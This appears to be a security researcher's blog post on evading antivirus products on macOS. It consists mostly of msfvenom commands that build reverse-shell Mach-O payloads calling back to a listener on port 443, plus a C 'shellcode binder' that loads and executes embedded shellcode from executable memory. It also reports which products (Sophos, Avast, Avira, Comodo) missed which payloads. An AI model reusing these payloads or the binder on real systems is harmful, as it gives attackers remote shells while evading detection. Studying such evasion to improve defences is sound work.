A few months ago I did some research on antivirus (evasion) on OSX and now I decided to write a blog post about it.
Scope
* build executables that are not recognized by Antivirus Mac OSX
* for building Mac OSX executables you need Mac OSX
* shellcode/payload with MSF
* developed with C & some assembly
* main focus is learning and automatiziation
Why?
Some high profile targets use OSX… so AV might be a thing.
Dmitry Medvedev:
http://obamapacman.com/2009/08/russia-president-dmitry-medvedev-mac-user-kremlin/
As do some security researchers 😉
Charlie Miller:
Targeted Malware
… or like APT 28:
Click to access Bitdefender-Whitepaper-APT-Mac-A4-en-EN-web.pdf
Test Cases and PoCs
* eicar
* msfvenom -p osx/x64/shell_reverse_tcp EXITFUNC=process LHOST=192.168.2.111 LPORT=443 -a x64 –platform OSX -e x64/xor -f macho -o osx64_reverse_xor.out
* msfvenom -p osx/x64/shell_reverse_tcp EXITFUNC=process LHOST=192.168.2.111 LPORT=443 -a x64 –platform OSX -f macho -o osx64_reverse.out
* msfvenom -p osx/x86/shell_reverse_tcp EXITFUNC=process LHOST=192.168.2.111 LPORT=443 –platform OSX -f macho -o osx86_reverse.out
* gcc -o osx64_sc_binder.out osx64_sc_binder.c
osx64_sc_binder.c
#include <string.h> #include <sys/mman.h> unsigned char buf[] = "\x48\x31\xc9\x48\x81\xe9\xf2\xff\xff\xff\x48\x8d\x05\xef\xff" ... "\x15"; int main(int argc, char **argv) { void *ptr = mmap(0, 0x1000, PROT_WRITE|PROT_READ|PROT_EXEC, MAP_ANON | MAP_PRIVATE, -1, 0); memcpy(ptr,buf,sizeof buf); void (*fp)() = (void (*)())ptr; fp(); }
And then some testing….
Comodo
… found nothing, only eicar.
Sophos
Recognized as malicious:
msfvenom -p osx/x64/shell_reverse_tcp EXITFUNC=process LHOST=192.168.2.111 LPORT=443 -a x64 –platform OSX -e x64/xor -f macho -o a.out
Not recognized: osx64_sc_binder.c
Avast
Recognized as malicious:
msfvenom -p osx/x64/shell_reverse_tcp EXITFUNC=process LHOST=192.168.2.111 LPORT=443 -a x64 –platform OSX -e x64/xor -f macho -o a.out
Not recognized: osx64_sc_binder.c
Avira
Not recognized:
msfvenom -p osx/x64/shell_reverse_tcp EXITFUNC=process LHOST=192.168.2.111 LPORT=443 -a x64 –platform OSX -e x64/xor -f macho -o a.out
… no further testing.
Finally
As can be seen, not much efford is needed for evading AV software on MacOSX, The shellcode binder was enough for evading all tested platforms.
The binder: https://github.com/govolution/avepoc/blob/master/osx64_sc_binder.c
Nevertheless I made a small PoC version of AVET (based on the old version 1.3) for OSX (https://github.com/govolution/avetosx):
Maybe I will try to integrate it in AVET 2 some time.
Leave a Reply